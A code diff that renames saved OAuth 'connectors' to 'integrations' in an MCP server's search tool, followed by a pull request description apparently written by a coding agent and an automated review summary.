-	parseConnectorConfig,
-	parseConnectorJson,
-	parseConnectorValueName,
-} from '#mcp/capabilities/values/connector-shared.ts'
+	parseIntegrationConfig,
+	parseIntegrationJson,
+	parseIntegrationValueName,
+} from '#mcp/capabilities/values/integration-shared.ts'
 import { getCapabilityRegistryForContext } from '#mcp/capabilities/registry.ts'
 import {
 	blendLexicalAndVectorScore,
@@ -266,13 +266,13 @@ function buildPackageRelationTokens(
 	)
 }
 
-function buildConnectorSearchDocument(input: {
-	connectorName: string
+function buildIntegrationSearchDocument(input: {
+	integrationName: string
 	description: string
-	config: NonNullable<ReturnType<typeof parseConnectorConfig>>
+	config: NonNullable<ReturnType<typeof parseIntegrationConfig>>
 }): string {
 	return [
-		input.connectorName,
+		input.integrationName,
 		input.description,
 		input.config.tokenUrl,
 		input.config.apiBaseUrl ?? '',
@@ -288,26 +288,28 @@ function buildRecommendedNextStep(
 ): string | undefined {
 	const [topMatch] = input.matches
 	const topPackage = input.matches.find((match) => match.type === 'package')
-	const topConnector = input.matches.find((match) => match.type === 'connector')
+	const topIntegration = input.matches.find(
+		(match) => match.type === 'integration',
+	)
 	const packageRelationTokens = topPackage
 		? buildPackageRelationTokens(topPackage)
 		: null
-	const connectorMatchesPackage =
+	const integrationMatchesPackage =
 		topPackage &&
-		topConnector &&
-		(packageRelationTokens?.has(topConnector.connectorName.toLowerCase()) ??
+		topIntegration &&
+		(packageRelationTokens?.has(topIntegration.integrationName.toLowerCase()) ??
 			false)
 
-	if (connectorMatchesPackage && input.intent.task.name === 'operate') {
-		return `Found saved package \`${topPackage.kodyId}\` and connector \`${topConnector.connectorName}\`. Inspect the package with \`search({ entity: "${topPackage.kodyId}:package" })\`, then use the connector detail or an authenticated \`execute\` smoke test to confirm the integration path before running API-backed actions.`
+	if (integrationMatchesPackage && input.intent.task.name === 'operate') {
+		return `Found saved package \`${topPackage.kodyId}\` and integration \`${topIntegration.integrationName}\`. Inspect the package with \`search({ entity: "${topPackage.kodyId}:package" })\`, then use the integration detail or an authenticated \`execute\` smoke test to confirm the integration path before running API-backed actions.`
 	}
 	if (topMatch?.type === 'package') {
 		return topMatch.hasApp
 			? `Open the saved app with \`open_generated_ui({ kody_id: "${topMatch.kodyId}" })\` or inspect package detail with \`search({ entity: "${topMatch.kodyId}:package" })\` to review exports and jobs.`
 			: `Inspect package detail with \`search({ entity: "${topMatch.kodyId}:package" })\` to review exports, then import the right entry from \`kody:@${topMatch.kodyId}\` or a subpath export.`
 	}
-	if (topMatch?.type === 'connector') {
-		return `Inspect connector detail with \`search({ entity: "${topMatch.connectorName}:connector" })\` and then run a minimal authenticated \`execute\` smoke test before building or calling integration-backed code.`
+	if (topMatch?.type === 'integration') {
+		return `Inspect integration detail with \`search({ entity: "${topMatch.integrationName}:integration" })\` and then run a minimal authenticated \`execute\` smoke test before building or calling integration-backed code.`
 	}
 	if (topMatch?.type === 'capability') {
 		return `Inspect capability detail with \`search({ entity: "${topMatch.name}:capability" })\` to confirm the TypeScript call shape, then call it from \`execute\` via \`codemode.${topMatch.name}(args)\`.`
@@ -407,18 +409,18 @@ function buildSearchableEntityDescriptors(input: {
 	}
 
 	for (const row of input.optionalRows.userValueRows) {
-		const connectorName = parseConnectorValueName(row.name)
-		if (connectorName) {
-			const config = parseConnectorConfig(
-				parseConnectorJson(row.value),
-				connectorName,
+		const integrationName = parseIntegrationValueName(row.name)
+		if (integrationName) {
+			const config = parseIntegrationConfig(
+				parseIntegrationJson(row.value),
+				integrationName,
 			)
 			if (!config) continue
 			descriptors.push({
-				type: 'connector',
-				id: connectorName,
-				title: connectorName,
-				primaryAliases: [connectorName],
+				type: 'integration',
+				id: integrationName,
+				title: integrationName,
+				primaryAliases: [integrationName],
 				secondaryAliases: [
 					row.description,
 					config.apiBaseUrl ?? '',
@@ -706,16 +708,16 @@ function scoreTaskAffinity(
 					appAvailability += 0.12
 				}
 			}
-			if (candidate.type === 'connector') taskAffinity += 0.08
+			if (candidate.type === 'integration') taskAffinity += 0.08
 			if (candidate.type === 'capability') taskAffinity -= 0.04
 			break
 		case 'setup':
-			if (candidate.type === 'connector') taskAffinity += 0.18
+			if (candidate.type === 'integration') taskAffinity += 0.18
 			if (candidate.type === 'value') taskAffinity += 0.06
 			if (candidate.type === 'capability') taskAffinity += 0.05
 			break
 		case 'inspect':
-			if (candidate.type === 'value' || candidate.type === 'connector') {
+			if (candidate.type === 'value' || candidate.type === 'integration') {
 				taskAffinity += 0.12
 			}
 			if (candidate.type === 'package') taskAffinity += 0.05
@@ -725,7 +727,7 @@ function scoreTaskAffinity(
 			if (candidate.type === 'package') taskAffinity -= 0.02
 			break
 		case 'debug':
-			if (candidate.type === 'connector') taskAffinity += 0.16
+			if (candidate.type === 'integration') taskAffinity += 0.16
 			if (candidate.type === 'package') {
 				taskAffinity += 0.1
 				if ('hasApp' in candidate.match && candidate.match.hasApp) {
@@ -991,7 +993,7 @@ function buildValueCandidates(input: {
 }): Array<SearchCandidate> {
 	return input.rows
 		.flatMap((row) => {
-			if (parseConnectorValueName(row.name)) return []
+			if (parseIntegrationValueName(row.name)) return []
 			const lexical = lexicalScore(
 				input.query,
 				[row.name, row.description, row.scope, row.value].join('\n'),
@@ -1019,25 +1021,25 @@ function buildValueCandidates(input: {
 		.filter((candidate) => candidate.scoreComponents.base > 0)
 }
 
-function buildConnectorCandidates(input: {
+function buildIntegrationCandidates(input: {
 	query: string
 	rows: Array<ValueMetadata>
 	queryEmbedding: ReadonlyArray<number>
 }): Array<SearchCandidate> {
 	return input.rows
 		.flatMap((row) => {
-			const connectorName = parseConnectorValueName(row.name)
-			if (!connectorName) return []
-			const config = parseConnectorConfig(
-				parseConnectorJson(row.value),
-				connectorName,
+			const integrationName = parseIntegrationValueName(row.name)
+			if (!integrationName) return []
+			const config = parseIntegrationConfig(
+				parseIntegrationJson(row.value),
+				integrationName,
 			)
 			if (!config) return []
-			const document = buildConnectorSearchDocument({
-				connectorName,
+			const document = buildIntegrationSearchDocument({
+				integrationName,
 				description:
 					row.description.trim() ||
-					`Saved OAuth connector configuration (${config.flow} flow).`,
+					`Saved OAuth integration configuration (${config.flow} flow).`,
 				config,
 			})
 			const lexical = lexicalScore(input.query, document)
@@ -1048,12 +1050,12 @@ function buildConnectorCandidates(input: {
 			return [
 				{
 					match: {
-						type: 'connector' as const,
-						connectorName,
-						title: connectorName,
+						type: 'integration' as const,
+						integrationName,
+						title: integrationName,
 						description:
 							row.description.trim() ||
-							`Saved OAuth connector configuration (${config.flow} flow).`,
+							`Saved OAuth integration configuration (${config.flow} flow).`,
 						flow: config.flow,
 						tokenUrl: config.tokenUrl,
 						apiBaseUrl: config.apiBaseUrl ?? null,
@@ -1063,11 +1065,11 @@ function buildConnectorCandidates(input: {
 						accessTokenSecretName: config.accessTokenSecretName,
 						refreshTokenSecretName: config.refreshTokenSecretName ?? null,
 					},
-					type: 'connector' as const,
-					id: connectorName,
-					title: connectorName,
+					type: 'integration' as const,
+					id: integrationName,
+					title: integrationName,
 					searchFields: [
-						connectorName,
+						integrationName,
 						row.description,
 						config.flow,
 						config.apiBaseUrl ?? '',
@@ -1213,7 +1215,7 @@ export async function searchUnified(input: {
 			query: intent.normalizedQuery,
 			rows: input.optionalRows.userValueRows,
 		}),
-		...buildConnectorCandidates({
+		...buildIntegrationCandidates({
 			query: intent.normalizedQuery,
 			rows: input.optionalRows.userValueRows,
 			queryEmbedding,
@@ -1347,10 +1349,10 @@ function applyMaxResponseSize<TPayload>(
 
 const searchTool = {
 	name: 'search',
-	title: 'Search Capabilities, Packages, Values, Connectors, and Secrets',
+	title: 'Search Capabilities, Packages, Values, Integrations, and Secrets',
 	description: `
 Find **built-in capabilities**, **saved packages**, **persisted values**,
-**saved connectors**, and **user secret references** (metadata only)
+**saved integrations**, and **user secret references** (metadata only)
 before \`execute\` or \`open_generated_ui\`.
 
 **query** — compact ranked markdown + structured matches (order matters). Query
@@ -1359,15 +1361,15 @@ If nothing useful returns, rephrase or call \`meta_list_capabilities\`; \`entity
 does not fix an empty ranked list.
 
 **entity: "{id}:{type}"** — detail for one hit (\`capability\` | \`value\`
-| \`connector\` | \`package\` | \`secret\`). Capability detail includes
+| \`integration\` | \`package\` | \`secret\`). Capability detail includes
 TypeScript call-shape definitions by default.
 
 Packages: \`package_list\`, \`package_get\`, and \`repo_*\` for editing/publishing.
 Open package apps with \`open_generated_ui({ kody_id })\` or use hosted package URLs.
 Secrets: never raw in results; use
 \`codemode.secret_list\` during execute and UI for missing values.
-Persisted values use \`codemode.value_get\` / \`codemode.value_list\`. Connectors
-use \`codemode.connector_get\` / \`codemode.connector_list\`.
+Persisted values use \`codemode.value_get\` / \`codemode.value_list\`. Integrations
+use \`codemode.integration_get\` / \`codemode.integration_list\`.
 
 If results look incomplete: \`meta_list_capabilities\` (full registry) or
 \`meta_list_remote_connector_status\` (remote connectors).
@@ -1375,11 +1377,11 @@ If results look incomplete: \`meta_list_capabilities\` (full registry) or
 Optional **limit** (default 15) and **maxResponseSize** trim low-ranked results.
 Example arguments:
 - \`{ "query": "saved github automation package", "limit": 10 }\`
-- \`{ "query": "preferred org value or saved connector", "limit": 10 }\`
+- \`{ "query": "preferred org value or saved integration", "limit": 10 }\`
 - \`{ "query": "package with worker app ui", "limit": 10 }\`
 - \`{ "entity": "kody_official_guide:capability" }\`
 - \`{ "entity": "user:preferred_org:value" }\`
-- \`{ "entity": "github:connector" }\`
+- \`{ "entity": "github:integration" }\`
 - To open a saved package app: \`open_generated_ui({ "kody_id": "<kody-id>" })\`
 
 https://github.com/kentcdodds/kody/blob/main/docs/use/search.md
@@ -1545,15 +1547,15 @@ async function loadSearchRowsAndRegistry(input: {
 	}
 }
 
-function findConnectorDetail(
+function findIntegrationDetail(
 	rows: Array<ValueMetadata>,
-	connectorName: string,
+	integrationName: string,
 ) {
 	for (const row of rows) {
-		if (parseConnectorValueName(row.name) !== connectorName) continue
-		const config = parseConnectorConfig(
-			parseConnectorJson(row.value),
-			connectorName,
+		if (parseIntegrationValueName(row.name) !== integrationName) continue
+		const config = parseIntegrationConfig(
+			parseIntegrationJson(row.value),
+			integrationName,
 		)
 		if (!config) continue
 		return { row, config }
@@ -1632,23 +1634,23 @@ async function resolveEntityDetail(input: {
 		}
 	}
 
-	if (ref.type === 'connector') {
-		const connector = findConnectorDetail(
+	if (ref.type === 'integration') {
+		const integration = findIntegrationDetail(
 			input.searchRows.userValueRows,
 			ref.id,
 		)
-		if (!connector) {
-			throw new Error('Saved connector not found for this user.')
+		if (!integration) {
+			throw new Error('Saved integration not found for this user.')
 		}
 		return {
-			type: 'connector' as const,
-			id: connector.config.name,
-			title: connector.config.name,
+			type: 'integration' as const,
+			id: integration.config.name,
+			title: integration.config.name,
 			description:
-				connector.row.description.trim() ||
-				`Saved OAuth connector configuration (${connector.config.flow} flow).`,
-			row: connector.row,
-			config: connector.config,
+				integration.row.description.trim() ||
+				`Saved OAuth integration configuration (${integration.config.flow} flow).`,
+			row: integration.row,
+			config: integration.config,
 		}
 	}
 
@@ -1684,7 +1686,7 @@ export async function registerSearchTool(agent: McpRegistrationAgent) {
 					.min(1)
 					.optional()
 					.describe(
-						'Optional exact entity reference in the format "{id}:{type}" where type is capability, package, secret, value, or connector.',
+						'Optional exact entity reference in the format "{id}:{type}" where type is capability, package, secret, value, or integration.',
 					),
 				limit: z
 					.number()


### PR DESCRIPTION
<!-- CURSOR_AGENT_PR_BODY_BEGIN -->
## Summary
- Rename saved OAuth/user config capabilities, storage/entity prefixes, and search result types from connector to integration (`integration_get/list/save/delete`, `_integration:*`, `:integration`).
- Update `/connect/oauth` and `/connect/secret` UI/API flows to use integration wording and `integration` secret-binding metadata.
- Refresh runtime helper/search/server instructions, end-user guides, and focused tests while preserving remote connector protocol/routes/docs.
- Address AI-reviewer feedback by validating new integration creation errors and covering the new-create path in tests.

## Tests
- `npx vitest run --project node-unit packages/worker/src/mcp/capabilities/values/integration-save.node.test.ts packages/worker/src/mcp/tools/search.node.test.ts packages/worker/src/mcp/tools/search-format.node.test.ts packages/worker/src/app/handlers/connect-secret.node.test.ts packages/worker/src/app/handlers/account-secrets.node.test.ts packages/worker/client/routes/connect-oauth.node.test.ts packages/worker/src/mcp/execute-modules/codemode-utils.node.test.ts packages/worker/src/mcp/execute-modules/authenticated-fetch.node.test.ts`
- `npm run typecheck`
- `npm run lint`
- Browser smoke test for `/connect/oauth` and `/connect/secret?...&integration=linear`: <a href="https://cursor.com/agents/bc-df23682a-5a1f-46ce-844b-8a9afe7b5139/artifacts?path=%2Fopt%2Fcursor%2Fartifacts%2Fintegration-oauth-secret-ui-smoke.mp4"><img src="https://cursor.com/artifacts/c/art-781511aa-8551-4941-a215-ca91bda8b2b4" alt="integration-oauth-secret-ui-smoke.mp4" /></a>
<!-- CURSOR_AGENT_PR_BODY_END -->

<div><a href="https://cursor.com/agents/bc-df23682a-5a1f-46ce-844b-8a9afe7b5139"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/assets/images/open-in-web-dark.png"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/assets/images/open-in-web-light.png"><img alt="Open in Web" width="114" height="28" src="https://cursor.com/assets/images/open-in-web-dark.png"></picture></a>&nbsp;<a href="https://cursor.com/background-agent?bcId=bc-df23682a-5a1f-46ce-844b-8a9afe7b5139"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/assets/images/open-in-cursor-dark.png"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/assets/images/open-in-cursor-light.png"><img alt="Open in Cursor" width="131" height="28" src="https://cursor.com/assets/images/open-in-cursor-dark.png"></picture></a>&nbsp;</div>



<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Documentation**
  * Replaced “connector” with “integration” across guides, examples, and API docs; clarified OAuth/integration naming and usage.

* **New Features**
  * Search, OAuth connect UI, and secret binding flows now surface and reference saved integrations (including an optional integration query param).

* **Bug Fixes**
  * Architecture guidance documents clarified host allowlist enforcement for OAuth flows and tightened host-validation guidance to avoid leaking tokens in errors.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->